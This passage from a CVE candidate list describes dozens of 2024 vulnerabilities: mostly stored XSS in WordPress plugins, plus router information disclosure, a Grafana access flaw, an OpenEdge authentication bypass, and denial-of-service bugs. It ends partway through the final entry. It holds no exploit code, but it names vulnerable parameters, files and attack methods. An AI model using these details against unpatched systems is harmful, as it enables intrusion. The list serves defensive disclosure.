CVE 2024 1449 Candidate The Master Slider – Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ms_slide shortcode in all versions up to, and including, 3.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://wordpress.org/plugins/master-slider/ | URL:https://wordpress.org/plugins/master-slider/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/af9adb6b-f726-4b74-be5c-82fdab0ae1f2?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/af9adb6b-f726-4b74-be5c-82fdab0ae1f2?source=cve Assigned (20240212)
CVE 2024 1448 Candidate The Social Sharing Plugin – Sassy Social Share plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.3.56 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/sassy-social-share/tags/3.3.56/includes/class-sassy-social-share-shortcodes.php | URL:https://plugins.trac.wordpress.org/browser/sassy-social-share/tags/3.3.56/includes/class-sassy-social-share-shortcodes.php | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3038227%40sassy-social-share%2Ftrunk&old=2996153%40sassy-social-share%2Ftrunk&sfp_email=&sfph_mail=#file8 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3038227%40sassy-social-share%2Ftrunk&old=2996153%40sassy-social-share%2Ftrunk&sfp_email=&sfph_mail=#file8 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1c2f4b74-2568-4e5a-b55f-0130096bc19f?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1c2f4b74-2568-4e5a-b55f-0130096bc19f?source=cve Assigned (20240212)
CVE 2024 1447 Candidate The Sydney Toolbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's aThemes Slider button element in all versions up to, and including, 1.25 due to insufficient input sanitization and output escaping on user supplied link. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/sydney-toolbox/trunk/inc/elementor/block-slider.php#L679 | URL:https://plugins.trac.wordpress.org/browser/sydney-toolbox/trunk/inc/elementor/block-slider.php#L679 | MISC:https://plugins.trac.wordpress.org/browser/sydney-toolbox/trunk/inc/elementor/block-slider.php#L692 | URL:https://plugins.trac.wordpress.org/browser/sydney-toolbox/trunk/inc/elementor/block-slider.php#L692 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035233%40sydney-toolbox%2Ftrunk&old=2980978%40sydney-toolbox%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035233%40sydney-toolbox%2Ftrunk&old=2980978%40sydney-toolbox%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1227f3bc-0bb3-4b80-ad69-2d4314fafbe4?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1227f3bc-0bb3-4b80-ad69-2d4314fafbe4?source=cve Assigned (20240212)
CVE 2024 1445 Candidate The Page scroll to id plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.7.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/page-scroll-to-id/tags/1.7.8/includes/malihu-pagescroll2id-shortcodes-php52.php | URL:https://plugins.trac.wordpress.org/browser/page-scroll-to-id/tags/1.7.8/includes/malihu-pagescroll2id-shortcodes-php52.php | MISC:https://plugins.trac.wordpress.org/browser/page-scroll-to-id/tags/1.7.8/includes/malihu-pagescroll2id-shortcodes.php | URL:https://plugins.trac.wordpress.org/browser/page-scroll-to-id/tags/1.7.8/includes/malihu-pagescroll2id-shortcodes.php | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035333%40page-scroll-to-id%2Ftrunk&old=3034857%40page-scroll-to-id%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035333%40page-scroll-to-id%2Ftrunk&old=3034857%40page-scroll-to-id%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c0d5f034-fd8b-456a-b44a-7d82db3a16a0?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c0d5f034-fd8b-456a-b44a-7d82db3a16a0?source=cve Assigned (20240212)
CVE 2024 1444 Candidate ** REJECT ** Erroneous assignment Assigned (20240212)
CVE 2024 1443 Candidate MSI Afterburner v4.6.5.16370 is vulnerable to a Denial of Service vulnerability by triggering the 0x80002000 IOCTL code of the RTCore64.sys driver. The handle to the driver can only be obtained from a high integrity process. MISC:https://fluidattacks.com/advisories/coltrane/ | URL:https://fluidattacks.com/advisories/coltrane/ | MISC:https://www.msi.com/Landing/afterburner/graphics-cards | URL:https://www.msi.com/Landing/afterburner/graphics-cards Assigned (20240212)
CVE 2024 1442 Candidate A user with the permissions to create a data source can use Grafana API to create a data source with UID set to *. Doing this will grant the user access to read, query, edit and delete all data sources within the organization. MISC:https://grafana.com/security/security-advisories/cve-2024-1442/ | URL:https://grafana.com/security/security-advisories/cve-2024-1442/ Assigned (20240212)
CVE 2024 1441 Candidate An off-by-one error flaw was found in the udevListInterfacesByStatus() function in libvirt when the number of interfaces exceeds the size of the `names` array. This issue can be reproduced by sending specially crafted data to the libvirt daemon, allowing an unprivileged client to perform a denial of service attack by causing the libvirt daemon to crash. FEDORA:FEDORA-2024-d96cdeb8ec | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/45FFKU3LODT345LAB5T4XZA5WKYMXJYU/ | MISC:RHBZ#2263841 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2263841 | MISC:https://access.redhat.com/security/cve/CVE-2024-1441 | URL:https://access.redhat.com/security/cve/CVE-2024-1441 Assigned (20240212)
CVE 2024 1439 Candidate Inadequate access control in Moodle LMS. This vulnerability could allow a local user with a student role to create arbitrary events intended for users with higher roles. It could also allow the attacker to add events to the calendar of all users without their prior consent. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/inadequate-access-control-vulnerability-moodle | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/inadequate-access-control-vulnerability-moodle Assigned (20240212)
CVE 2024 1437 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in José Fernandez Adsmonetizer allows Reflected XSS.This issue affects Adsmonetizer: from n/a through 3.1.2. MISC:https://patchstack.com/database/vulnerability/adsensei-b30/wordpress-adsmonetizer-plugin-3-1-2-reflected-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/adsensei-b30/wordpress-adsmonetizer-plugin-3-1-2-reflected-xss-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 1436 Candidate Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wiloke WooCommerce Coupon Popup, SmartBar, Slide In | MyShopKit.This issue affects WooCommerce Coupon Popup, SmartBar, Slide In | MyShopKit: from n/a through 1.0.9. MISC:https://patchstack.com/database/vulnerability/myshopkit-popup-smartbar-slidein/wordpress-woocommerce-myshopkit-plugin-1-0-9-sensitive-data-exposure-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/myshopkit-popup-smartbar-slidein/wordpress-woocommerce-myshopkit-plugin-1-0-9-sensitive-data-exposure-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 1435 Candidate Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Tainacan.Org Tainacan.This issue affects Tainacan: from n/a through 0.20.6. MISC:https://patchstack.com/database/vulnerability/tainacan/wordpress-tainacan-plugin-0-20-6-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/tainacan/wordpress-tainacan-plugin-0-20-6-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 1434 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jordy Meow Media Alt Renamer allows Stored XSS.This issue affects Media Alt Renamer: from n/a through 0.0.1. MISC:https://patchstack.com/database/vulnerability/media-alt-renamer/wordpress-media-alt-renamer-plugin-0-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/media-alt-renamer/wordpress-media-alt-renamer-plugin-0-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 1433 Candidate A vulnerability, which was classified as problematic, was found in KDE Plasma Workspace up to 5.93.0. This affects the function EventPluginsManager::enabledPlugins of the file components/calendar/eventpluginsmanager.cpp of the component Theme File Handler. The manipulation of the argument pluginId leads to path traversal. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The patch is named 6cdf42916369ebf4ad5bd876c4dfa0170d7b2f01. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-253407. NOTE: This requires write access to user's home or the installation of third party global themes. MISC:https://github.com/KDE/plasma-workspace/commit/6cdf42916369ebf4ad5bd876c4dfa0170d7b2f01 | URL:https://github.com/KDE/plasma-workspace/commit/6cdf42916369ebf4ad5bd876c4dfa0170d7b2f01 | MISC:https://vuldb.com/?ctiid.253407 | URL:https://vuldb.com/?ctiid.253407 | MISC:https://vuldb.com/?id.253407 | URL:https://vuldb.com/?id.253407 Assigned (20240211)
CVE 2024 1432 Candidate ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in DeepFaceLab pretrained DF.wf.288res.384.92.72.22 and classified as problematic. This issue affects the function apply_xseg of the file main.py. The manipulation leads to deserialization. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-253391. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. MISC:https://github.com/bayuncao/vul-cve-12 | URL:https://github.com/bayuncao/vul-cve-12 | MISC:https://vuldb.com/?ctiid.253391 | URL:https://vuldb.com/?ctiid.253391 | MISC:https://vuldb.com/?id.253391 | URL:https://vuldb.com/?id.253391 Assigned (20240210)
CVE 2024 1431 Candidate A vulnerability was found in Netgear R7000 1.0.11.136_10.2.120 and classified as problematic. Affected by this issue is some unknown functionality of the file /debuginfo.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. VDB-253382 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/leetsun/Hints/tree/main/R7000/2 | URL:https://github.com/leetsun/Hints/tree/main/R7000/2 | MISC:https://vuldb.com/?ctiid.253382 | URL:https://vuldb.com/?ctiid.253382 | MISC:https://vuldb.com/?id.253382 | URL:https://vuldb.com/?id.253382 Assigned (20240210)
CVE 2024 1430 Candidate A vulnerability has been found in Netgear R7000 1.0.11.136_10.2.120 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /currentsetting.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier VDB-253381 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/leetsun/Hints/tree/main/R7000/1 | URL:https://github.com/leetsun/Hints/tree/main/R7000/1 | MISC:https://vuldb.com/?ctiid.253381 | URL:https://vuldb.com/?ctiid.253381 | MISC:https://vuldb.com/?id.253381 | URL:https://vuldb.com/?id.253381 Assigned (20240210)
CVE 2024 1425 Candidate The EmbedPress – Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Google Calendar Widget Link in all versions up to, and including, 3.9.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/embedpress/tags/3.9.8/EmbedPress/Elementor/Widgets/Embedpress_Calendar.php#L314 | URL:https://plugins.trac.wordpress.org/browser/embedpress/tags/3.9.8/EmbedPress/Elementor/Widgets/Embedpress_Calendar.php#L314 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035539%40embedpress%2Ftrunk&old=3029957%40embedpress%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035539%40embedpress%2Ftrunk&old=3029957%40embedpress%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4d4568c8-f58c-4c37-94b9-6154e5c46928?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4d4568c8-f58c-4c37-94b9-6154e5c46928?source=cve Assigned (20240209)
CVE 2024 1423 Candidate ** REJECT ** Accidental Request Assigned (20240209)
CVE 2024 1422 Candidate The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the modal popup widget's effect setting in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/modal-popup/widgets/modal-popup.php#L1048 | URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/modal-popup/widgets/modal-popup.php#L1048 | MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/modal-popup/widgets/modal-popup.php#L1062 | URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/modal-popup/widgets/modal-popup.php#L1062 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037925%40addon-elements-for-elementor-page-builder%2Ftrunk&old=3031349%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file26 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037925%40addon-elements-for-elementor-page-builder%2Ftrunk&old=3031349%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file26 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4ba28184-b5c3-4a5c-a376-29b3c6a2aa20?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4ba28184-b5c3-4a5c-a376-29b3c6a2aa20?source=cve Assigned (20240209)
CVE 2024 1421 Candidate The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘border_type’ attribute of the Post Carousel widget in all versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/includes/widgets/htmega_post_carousel.php#L2243 | URL:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/includes/widgets/htmega_post_carousel.php#L2243 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a71cbe66-4187-4260-bb87-8579bc6e75f5?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a71cbe66-4187-4260-bb87-8579bc6e75f5?source=cve Assigned (20240209)
CVE 2024 1420 Candidate ** REJECT ** This is a duplicate of CVE-2024-1049. Please use CVE-2024-1049 instead. Assigned (20240209)
CVE 2024 1419 Candidate The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘_id’ attribute of the Header Meta Content widget in all versions up to, and including, 5.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3043999/the-plus-addons-for-elementor-page-builder | URL:https://plugins.trac.wordpress.org/changeset/3043999/the-plus-addons-for-elementor-page-builder | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d0b3d83b-9695-40c5-b6ee-2a76c940de6e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d0b3d83b-9695-40c5-b6ee-2a76c940de6e?source=cve Assigned (20240209)
CVE 2024 1414 Candidate The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Call To Action widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3042217/exclusive-addons-for-elementor | URL:https://plugins.trac.wordpress.org/changeset/3042217/exclusive-addons-for-elementor | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6a12acf0-932e-4dff-9da6-9fbace11dbe1?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6a12acf0-932e-4dff-9da6-9fbace11dbe1?source=cve Assigned (20240209)
CVE 2024 1413 Candidate The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown Timer widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3042217/exclusive-addons-for-elementor | URL:https://plugins.trac.wordpress.org/changeset/3042217/exclusive-addons-for-elementor | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f40956e0-6e5c-4965-84f8-2420ad14a299?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f40956e0-6e5c-4965-84f8-2420ad14a299?source=cve Assigned (20240209)
CVE 2024 1411 Candidate The PowerPack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the settings of the Twitter Buttons Widget in all versions up to, and including, 2.7.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3035790/powerpack-lite-for-elementor | URL:https://plugins.trac.wordpress.org/changeset/3035790/powerpack-lite-for-elementor | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/64480862-c076-4ea9-a03b-9aed81f876d5?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/64480862-c076-4ea9-a03b-9aed81f876d5?source=cve Assigned (20240209)
CVE 2024 1410 Candidate Cloudflare quiche was discovered to be vulnerable to unbounded storage of information related to connection ID retirement, which could lead to excessive resource consumption. Each QUIC connection possesses a set of connection Identifiers (IDs); see RFC 9000 Section 5.1 https://datatracker.ietf.org/doc/html/rfc9000#section-5.1 . Endpoints declare the number of active connection IDs they are willing to support using the active_connection_id_limit transport parameter. The peer can create new IDs using a NEW_CONNECTION_ID frame but must stay within the active ID limit. This is done by retirement of old IDs, the endpoint sends NEW_CONNECTION_ID includes a value in the retire_prior_to field, which elicits a RETIRE_CONNECTION_ID frame as confirmation. An unauthenticated remote attacker can exploit the vulnerability by sending NEW_CONNECTION_ID frames and manipulating the connection (e.g. by restricting the peer's congestion window size) so that RETIRE_CONNECTION_ID frames can only be sent at a slower rate than they are received, leading to storage of information related to connection IDs in an unbounded queue. Quiche versions 0.19.2 and 0.20.1 are the earliest to address this problem. There is no workaround for affected versions. MISC:https://github.com/cloudflare/quiche/security/advisories/GHSA-xhg9-xwch-vr7x | URL:https://github.com/cloudflare/quiche/security/advisories/GHSA-xhg9-xwch-vr7x Assigned (20240209)
CVE 2024 1409 Candidate The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [reg-select-role] shortcode in all versions up to, and including, 4.15.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038677%40wp-user-avatar&new=3038677%40wp-user-avatar&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038677%40wp-user-avatar&new=3038677%40wp-user-avatar&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/53e16bca-7c85-4d56-8233-b3b53f793b39?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/53e16bca-7c85-4d56-8233-b3b53f793b39?source=cve Assigned (20240209)
CVE 2024 1408 Candidate The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's edit-profile-text-box shortcode in all versions up to, and including, 4.14.4 due to insufficient input sanitization and output escaping on user supplied attributes such as 'type'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://github.com/WordpressPluginDirectory/wp-user-avatar/blob/fde360946c86d67610d8f95a82752199ce25b39a/wp-user-avatar/sr/ShortcodeParser/Builder/FieldsShortcodeCallback.php#L524 | URL:https://github.com/WordpressPluginDirectory/wp-user-avatar/blob/fde360946c86d67610d8f95a82752199ce25b39a/wp-user-avatar/sr/ShortcodeParser/Builder/FieldsShortcodeCallback.php#L524 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6e50081f-6658-4cc7-bf0a-d04464820926?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6e50081f-6658-4cc7-bf0a-d04464820926?source=cve Assigned (20240209)
CVE 2024 1406 Candidate A vulnerability was found in Linksys WRT54GL 4.30.18. It has been declared as problematic. This vulnerability affects unknown code of the file /SysInfo1.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. VDB-253330 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/leetsun/Hints/tree/main/linksys-wrt54gl/3 | URL:https://github.com/leetsun/Hints/tree/main/linksys-wrt54gl/3 | MISC:https://vuldb.com/?ctiid.253330 | URL:https://vuldb.com/?ctiid.253330 | MISC:https://vuldb.com/?id.253330 | URL:https://vuldb.com/?id.253330 Assigned (20240209)
CVE 2024 1405 Candidate A vulnerability was found in Linksys WRT54GL 4.30.18. It has been classified as problematic. This affects an unknown part of the file /wlaninfo.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier VDB-253329 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/leetsun/Hints/tree/main/linksys-wrt54gl/2 | URL:https://github.com/leetsun/Hints/tree/main/linksys-wrt54gl/2 | MISC:https://vuldb.com/?ctiid.253329 | URL:https://vuldb.com/?ctiid.253329 | MISC:https://vuldb.com/?id.253329 | URL:https://vuldb.com/?id.253329 Assigned (20240209)
CVE 2024 1404 Candidate A vulnerability was found in Linksys WRT54GL 4.30.18 and classified as problematic. Affected by this issue is some unknown functionality of the file /SysInfo.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253328. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/leetsun/Hints/tree/main/linksys-wrt54gl/1 | URL:https://github.com/leetsun/Hints/tree/main/linksys-wrt54gl/1 | MISC:https://vuldb.com/?ctiid.253328 | URL:https://vuldb.com/?ctiid.253328 | MISC:https://vuldb.com/?id.253328 | URL:https://vuldb.com/?id.253328 Assigned (20240209)
CVE 2024 1403 Candidate In OpenEdge Authentication Gateway and AdminServer prior to 11.7.19, 12.2.14, 12.8.1 on all platforms supported by the OpenEdge product, an authentication bypass vulnerability has been identified. The vulnerability is a bypass to authentication based on a failure to properly handle username and password. Certain unexpected content passed into the credentials can lead to unauthorized access without proper authentication. MISC:https://community.progress.com/s/article/Important-Critical-Alert-for-OpenEdge-Authentication-Gateway-and-AdminServer | URL:https://community.progress.com/s/article/Important-Critical-Alert-for-OpenEdge-Authentication-Gateway-and-AdminServer | MISC:https://www.progress.com/openedge | URL:https://www.progress.com/openedge Assigned (20240209)
CVE 2024 1402 Candidate Mattermost fails to check if a custom emoji reaction exists when sending it to a post and to limit the amount of custom emojis allowed to be added in a post, allowing an attacker sending a huge amount of non-existent custom emojis in a post to crash the mobile app of a user seeing the post. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240209)
CVE 2024 1401 Candidate The Profile Box Shortcode And Widget WordPress plugin before 1.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) MISC:https://wpscan.com/vulnerability/91064ba5-cf65-46e6-88df-0e4d96a3ef9f/ | URL:https://wpscan.com/vulnerability/91064ba5-cf65-46e6-88df-0e4d96a3ef9f/ Assigned (20240209)
CVE 2024 1400 Candidate The Mollie Forms plugin for WordPress is vulnerable to unauthorized post or page duplication due to a missing capability check on the duplicateForm function in all versions up to, and including, 2.6.3. This makes it possible for authenticated attackers, with subscriber access or higher, to duplicate arbitrary posts and pages. MISC:https://plugins.trac.wordpress.org/changeset/3046896/mollie-forms/trunk/classes/Admin.php | URL:https://plugins.trac.wordpress.org/changeset/3046896/mollie-forms/trunk/classes/Admin.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/43c4ca71-0bf0-4529-97d9-2349f96bbb9e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/43c4ca71-0bf0-4529-97d9-2349f96bbb9e?source=cve Assigned (20240209)
CVE 2024 1398 Candidate The Ultimate Bootstrap Elements for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘heading_title_tag’ and ’heading_sub_title_tag’ parameters in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/ultimate-bootstrap-elements-for-elementor/tags/1.3.6/templates/elements/heading.php#L50 | URL:https://plugins.trac.wordpress.org/browser/ultimate-bootstrap-elements-for-elementor/tags/1.3.6/templates/elements/heading.php#L50 | MISC:https://plugins.trac.wordpress.org/browser/ultimate-bootstrap-elements-for-elementor/tags/1.3.6/templates/elements/heading.php#L61 | URL:https://plugins.trac.wordpress.org/browser/ultimate-bootstrap-elements-for-elementor/tags/1.3.6/templates/elements/heading.php#L61 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ed191380-6037-4d59-8db7-cb33136a304e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ed191380-6037-4d59-8db7-cb33136a304e?source=cve Assigned (20240209)
CVE 2024 1397 Candidate The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's blocks in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping on the 'titleTag' user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/accordion-card/index.php#L17 | URL:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/accordion-card/index.php#L17 | MISC:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/cta/index.php#L22 | URL:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/cta/index.php#L22 | MISC:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/info-box/index.php#L55 | URL:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/info-box/index.php#L55 | MISC:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/section-title/index.php#L89 | URL:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/section-title/index.php#L89 | MISC:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/team/index.php#L28 | URL:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/team/index.php#L28 | 